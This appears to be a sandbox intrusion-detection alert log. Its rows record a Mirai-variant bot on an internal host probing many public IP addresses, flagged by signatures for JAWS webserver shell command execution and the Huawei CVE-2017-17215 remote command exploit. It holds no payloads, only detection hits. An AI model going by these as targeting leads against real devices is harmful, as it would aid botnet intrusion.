                                                2024-12-03T22:17:25.555492+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346992122.51.34.24580TCP
                                                2024-12-03T22:17:25.555501+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345804141.101.229.1480TCP
                                                2024-12-03T22:17:25.555501+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345804141.101.229.1480TCP
                                                2024-12-03T22:17:25.655752+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343326223.224.73.20380TCP
                                                2024-12-03T22:17:25.655752+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343326223.224.73.20380TCP
                                                2024-12-03T22:17:25.664505+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235010441.152.153.12337215TCP
                                                2024-12-03T22:17:26.483400+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235330694.202.68.7080TCP
                                                2024-12-03T22:17:26.483400+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235330694.202.68.7080TCP
                                                2024-12-03T22:17:26.483476+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360528102.178.231.280TCP
                                                2024-12-03T22:17:26.483476+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360528102.178.231.280TCP
                                                2024-12-03T22:17:26.483679+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342128180.221.255.12280TCP
                                                2024-12-03T22:17:26.483679+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342128180.221.255.12280TCP
                                                2024-12-03T22:17:26.483762+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235243884.166.254.5180TCP
                                                2024-12-03T22:17:26.483762+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235243884.166.254.5180TCP
                                                2024-12-03T22:17:26.515006+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234305657.252.136.11880TCP
                                                2024-12-03T22:17:26.515006+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234305657.252.136.11880TCP
                                                2024-12-03T22:17:26.515130+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356840162.192.141.380TCP
                                                2024-12-03T22:17:26.515130+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356840162.192.141.380TCP
                                                2024-12-03T22:17:26.515202+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234575438.228.60.1880TCP
                                                2024-12-03T22:17:26.515202+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234575438.228.60.1880TCP
                                                2024-12-03T22:17:26.515379+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233437647.105.199.18780TCP
                                                2024-12-03T22:17:26.515379+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233437647.105.199.18780TCP
                                                2024-12-03T22:17:26.515446+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234971848.204.138.16080TCP
                                                2024-12-03T22:17:26.515446+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234971848.204.138.16080TCP
                                                2024-12-03T22:17:26.515699+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339310112.96.150.12580TCP
                                                2024-12-03T22:17:26.515699+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339310112.96.150.12580TCP
                                                2024-12-03T22:17:26.515763+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235701824.190.180.19580TCP
                                                2024-12-03T22:17:26.515763+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235701824.190.180.19580TCP
                                                2024-12-03T22:17:26.515913+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233925859.152.138.20780TCP
                                                2024-12-03T22:17:26.515913+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233925859.152.138.20780TCP
                                                2024-12-03T22:17:26.516040+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341280178.2.115.5580TCP
                                                2024-12-03T22:17:26.516040+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341280178.2.115.5580TCP
                                                2024-12-03T22:17:26.524305+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334228135.251.244.24980TCP
                                                2024-12-03T22:17:26.524305+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334228135.251.244.24980TCP
                                                2024-12-03T22:17:26.524390+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357768167.22.27.20080TCP
                                                2024-12-03T22:17:26.524390+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357768167.22.27.20080TCP
                                                2024-12-03T22:17:26.524512+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352820129.149.237.780TCP
                                                2024-12-03T22:17:26.524512+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352820129.149.237.780TCP
                                                2024-12-03T22:17:26.524601+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339402116.202.231.24580TCP
                                                2024-12-03T22:17:26.524601+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339402116.202.231.24580TCP
                                                2024-12-03T22:17:26.524764+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346824205.252.97.20680TCP
                                                2024-12-03T22:17:26.524764+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346824205.252.97.20680TCP
                                                2024-12-03T22:17:26.525069+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235780881.57.120.15580TCP
                                                2024-12-03T22:17:26.525069+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235780881.57.120.15580TCP
                                                2024-12-03T22:17:26.525087+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350334152.208.229.12180TCP
                                                2024-12-03T22:17:26.525087+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350334152.208.229.12180TCP
                                                2024-12-03T22:17:26.530425+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355708176.120.199.5680TCP
                                                2024-12-03T22:17:26.530425+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355708176.120.199.5680TCP
                                                2024-12-03T22:17:26.539411+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234796093.194.123.7680TCP
                                                2024-12-03T22:17:26.539411+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234796093.194.123.7680TCP
                                                2024-12-03T22:17:26.539627+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23483309.161.88.22980TCP
                                                2024-12-03T22:17:26.539627+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23483309.161.88.22980TCP
                                                2024-12-03T22:17:26.546051+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233473288.39.75.12780TCP
                                                2024-12-03T22:17:26.546051+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233473288.39.75.12780TCP
                                                2024-12-03T22:17:26.546122+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234907427.241.250.9780TCP
                                                2024-12-03T22:17:26.546122+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234907427.241.250.9780TCP
                                                2024-12-03T22:17:26.555231+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346752188.44.76.8280TCP
                                                2024-12-03T22:17:26.555231+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346752188.44.76.8280TCP
                                                2024-12-03T22:17:26.555339+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354972179.29.60.11680TCP
                                                2024-12-03T22:17:26.555339+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354972179.29.60.11680TCP
                                                2024-12-03T22:17:26.555603+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343326136.1.157.4580TCP
                                                2024-12-03T22:17:26.555603+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343326136.1.157.4580TCP
                                                2024-12-03T22:17:26.555736+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349126115.174.254.980TCP
                                                2024-12-03T22:17:26.555736+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349126115.174.254.980TCP
                                                2024-12-03T22:17:26.555908+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350414205.7.167.3380TCP
                                                2024-12-03T22:17:26.555908+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350414205.7.167.3380TCP
                                                2024-12-03T22:17:26.556188+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234292496.211.14.13680TCP
                                                2024-12-03T22:17:26.556188+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234292496.211.14.13680TCP
                                                2024-12-03T22:17:26.561647+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355370222.149.156.5980TCP
                                                2024-12-03T22:17:26.561647+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355370222.149.156.5980TCP
                                                2024-12-03T22:17:26.562032+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234004452.243.132.9080TCP
                                                2024-12-03T22:17:26.562032+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234004452.243.132.9080TCP
                                                2024-12-03T22:17:26.570798+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344772167.48.89.1180TCP
                                                2024-12-03T22:17:26.570798+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344772167.48.89.1180TCP
                                                2024-12-03T22:17:26.571191+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235112473.34.85.14880TCP
                                                2024-12-03T22:17:26.571191+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235112473.34.85.14880TCP
                                                2024-12-03T22:17:26.586504+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23383362.132.182.10480TCP
                                                2024-12-03T22:17:26.586504+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23383362.132.182.10480TCP
                                                2024-12-03T22:17:26.586538+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343984184.133.164.17280TCP
                                                2024-12-03T22:17:26.586538+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343984184.133.164.17280TCP
                                                2024-12-03T22:17:26.602131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334674119.62.113.14880TCP
                                                2024-12-03T22:17:26.602131+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334674119.62.113.14880TCP
                                                2024-12-03T22:17:26.749406+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336326104.129.192.3080TCP
                                                2024-12-03T22:17:26.749406+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336326104.129.192.3080TCP
                                                2024-12-03T22:17:26.749518+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23603341.48.153.3180TCP
                                                2024-12-03T22:17:26.749518+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23603341.48.153.3180TCP
                                                2024-12-03T22:17:26.764892+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342330193.81.123.15580TCP
                                                2024-12-03T22:17:26.764892+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342330193.81.123.15580TCP
                                                2024-12-03T22:17:26.765066+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347286132.121.27.12680TCP
                                                2024-12-03T22:17:26.765066+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347286132.121.27.12680TCP
                                                2024-12-03T22:17:26.765428+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234225240.201.96.6980TCP
                                                2024-12-03T22:17:26.765428+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234225240.201.96.6980TCP
                                                2024-12-03T22:17:26.765614+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344292147.169.251.380TCP
                                                2024-12-03T22:17:26.765614+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344292147.169.251.380TCP
                                                2024-12-03T22:17:26.774039+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234852485.166.29.8880TCP
                                                2024-12-03T22:17:26.774039+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234852485.166.29.8880TCP
                                                2024-12-03T22:17:26.796259+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351890152.18.186.5280TCP
                                                2024-12-03T22:17:26.796259+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351890152.18.186.5280TCP
                                                2024-12-03T22:17:26.814309+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333484180.33.117.14180TCP
                                                2024-12-03T22:17:26.814309+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333484180.33.117.14180TCP
                                                2024-12-03T22:17:26.821008+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234295831.153.242.17780TCP
                                                2024-12-03T22:17:26.821008+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234295831.153.242.17780TCP
                                                2024-12-03T22:17:27.546201+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360112208.160.36.11080TCP
                                                2024-12-03T22:17:27.546201+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360112208.160.36.11080TCP
                                                2024-12-03T22:17:27.603258+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235318423.65.54.7880TCP
                                                2024-12-03T22:17:27.603258+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235318423.65.54.7880TCP
                                                2024-12-03T22:17:27.868161+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347950128.53.112.20380TCP
                                                2024-12-03T22:17:27.868161+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347950128.53.112.20380TCP
                                                2024-12-03T22:17:27.868168+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234616050.40.222.21880TCP
                                                2024-12-03T22:17:27.868168+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234616050.40.222.21880TCP
                                                2024-12-03T22:17:27.868187+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341558159.129.33.5780TCP
                                                2024-12-03T22:17:27.868187+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341558159.129.33.5780TCP
                                                2024-12-03T22:17:27.868189+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235221474.140.209.20180TCP
                                                2024-12-03T22:17:27.868189+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235221474.140.209.20180TCP
                                                2024-12-03T22:17:27.868193+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345414119.7.68.10880TCP
                                                2024-12-03T22:17:27.868193+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345414119.7.68.10880TCP
                                                2024-12-03T22:17:27.868193+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355606130.99.153.14580TCP
                                                2024-12-03T22:17:27.868193+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355606130.99.153.14580TCP
                                                2024-12-03T22:17:27.868195+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338814213.127.9.24480TCP
                                                2024-12-03T22:17:27.868195+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338814213.127.9.24480TCP
                                                2024-12-03T22:17:27.868232+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23579724.20.92.22380TCP
                                                2024-12-03T22:17:27.868232+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23579724.20.92.22380TCP
                                                2024-12-03T22:17:27.868233+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234759076.92.78.11280TCP
                                                2024-12-03T22:17:27.868233+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234759076.92.78.11280TCP
                                                2024-12-03T22:17:27.868346+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235686053.16.184.8180TCP
                                                2024-12-03T22:17:27.868346+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357376140.209.104.12980TCP
                                                2024-12-03T22:17:27.868346+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357376140.209.104.12980TCP
                                                2024-12-03T22:17:27.868346+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235686053.16.184.8180TCP
                                                2024-12-03T22:17:27.868348+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233624095.242.147.17780TCP
                                                2024-12-03T22:17:27.868348+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233624095.242.147.17780TCP
                                                2024-12-03T22:17:27.868404+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343478122.93.228.24880TCP
                                                2024-12-03T22:17:27.868404+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343478122.93.228.24880TCP
                                                2024-12-03T22:17:27.868480+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349214219.175.97.7180TCP
                                                2024-12-03T22:17:27.868480+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349214219.175.97.7180TCP
                                                2024-12-03T22:17:27.884681+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234726899.147.210.3880TCP
                                                2024-12-03T22:17:27.884681+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234726899.147.210.3880TCP
                                                2024-12-03T22:17:27.915236+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359144166.63.105.9880TCP
                                                2024-12-03T22:17:27.915236+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359144166.63.105.9880TCP
                                                2024-12-03T22:17:28.514799+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333834151.51.89.7280TCP
                                                2024-12-03T22:17:28.514799+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333834151.51.89.7280TCP
                                                2024-12-03T22:17:28.524144+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235854283.86.34.1080TCP
                                                2024-12-03T22:17:28.524144+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235854283.86.34.1080TCP
                                                2024-12-03T22:17:28.530399+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235980046.71.5.5680TCP
                                                2024-12-03T22:17:28.530399+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235980046.71.5.5680TCP
                                                2024-12-03T22:17:28.530641+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234358488.81.6.18580TCP
                                                2024-12-03T22:17:28.530641+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234358488.81.6.18580TCP
                                                2024-12-03T22:17:28.530873+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352350211.150.95.16280TCP
                                                2024-12-03T22:17:28.530873+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352350211.150.95.16280TCP
                                                2024-12-03T22:17:28.545985+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355088197.148.94.12780TCP
                                                2024-12-03T22:17:28.545985+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355088197.148.94.12780TCP
                                                2024-12-03T22:17:28.546181+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355098193.157.209.11680TCP
                                                2024-12-03T22:17:28.546181+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355098193.157.209.11680TCP
                                                2024-12-03T22:17:28.561632+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339322216.253.100.1880TCP
                                                2024-12-03T22:17:28.561632+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339322216.253.100.1880TCP
                                                2024-12-03T22:17:28.561975+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235468027.102.158.5280TCP
                                                2024-12-03T22:17:28.561975+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235468027.102.158.5280TCP
                                                2024-12-03T22:17:28.561993+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336022104.35.149.16280TCP
                                                2024-12-03T22:17:28.561993+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336022104.35.149.16280TCP
                                                2024-12-03T22:17:28.562017+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23514401.52.172.13580TCP
                                                2024-12-03T22:17:28.562017+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23514401.52.172.13580TCP
                                                2024-12-03T22:17:28.586439+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342808170.77.116.12780TCP
                                                2024-12-03T22:17:28.586439+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342808170.77.116.12780TCP
                                                2024-12-03T22:17:28.586527+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335946130.49.81.23880TCP
                                                2024-12-03T22:17:28.586527+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335946130.49.81.23880TCP
                                                2024-12-03T22:17:28.592866+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234054265.194.145.24080TCP
                                                2024-12-03T22:17:28.592866+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234054265.194.145.24080TCP
                                                2024-12-03T22:17:28.593006+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340340213.151.138.12780TCP
                                                2024-12-03T22:17:28.593006+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340340213.151.138.12780TCP
                                                2024-12-03T22:17:28.593280+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342166189.137.32.2680TCP
                                                2024-12-03T22:17:28.593280+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342166189.137.32.2680TCP
                                                2024-12-03T22:17:28.593393+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235082434.161.39.680TCP
                                                2024-12-03T22:17:28.593393+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235082434.161.39.680TCP
                                                2024-12-03T22:17:28.593495+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353992165.123.114.13180TCP
                                                2024-12-03T22:17:28.593495+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353992165.123.114.13180TCP
                                                2024-12-03T22:17:28.593667+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235300254.67.175.480TCP
                                                2024-12-03T22:17:28.593667+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235300254.67.175.480TCP
                                                2024-12-03T22:17:28.602051+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338844153.143.252.15580TCP
                                                2024-12-03T22:17:28.602051+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338844153.143.252.15580TCP
                                                2024-12-03T22:17:28.602136+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351316198.209.119.5280TCP
                                                2024-12-03T22:17:28.602136+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351316198.209.119.5280TCP
                                                2024-12-03T22:17:28.602232+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335174121.31.140.12580TCP
                                                2024-12-03T22:17:28.602232+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335174121.31.140.12580TCP
                                                2024-12-03T22:17:28.602324+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233672665.145.54.8380TCP
                                                2024-12-03T22:17:28.602324+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233672665.145.54.8380TCP
                                                2024-12-03T22:17:28.602453+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23330104.190.171.5180TCP
                                                2024-12-03T22:17:28.602453+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23330104.190.171.5180TCP
                                                2024-12-03T22:17:28.602534+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235545266.188.144.20180TCP
                                                2024-12-03T22:17:28.602534+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235545266.188.144.20180TCP
                                                2024-12-03T22:17:28.602620+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356882201.128.240.19080TCP
                                                2024-12-03T22:17:28.602620+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356882201.128.240.19080TCP
                                                2024-12-03T22:17:28.602760+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353938167.66.184.22180TCP
                                                2024-12-03T22:17:28.602760+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353938167.66.184.22180TCP
                                                2024-12-03T22:17:28.617650+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236041424.130.50.11980TCP
                                                2024-12-03T22:17:28.617650+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236041424.130.50.11980TCP
                                                2024-12-03T22:17:28.617741+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235677084.64.138.17480TCP
                                                2024-12-03T22:17:28.617741+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235677084.64.138.17480TCP
                                                2024-12-03T22:17:28.618004+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339636159.94.198.20680TCP
                                                2024-12-03T22:17:28.618004+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339636159.94.198.20680TCP
                                                2024-12-03T22:17:28.633814+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351468174.205.29.20180TCP
                                                2024-12-03T22:17:28.633814+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351468174.205.29.20180TCP
                                                2024-12-03T22:17:28.633835+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349068145.181.27.6280TCP
                                                2024-12-03T22:17:28.633835+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349068145.181.27.6280TCP
                                                2024-12-03T22:17:28.680318+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235362041.134.113.10137215TCP
                                                2024-12-03T22:17:28.690800+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234595031.44.219.14880TCP
                                                2024-12-03T22:17:28.690800+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234595031.44.219.14880TCP
                                                2024-12-03T22:17:28.780818+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344874173.230.202.4780TCP
                                                2024-12-03T22:17:28.780818+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344874173.230.202.4780TCP
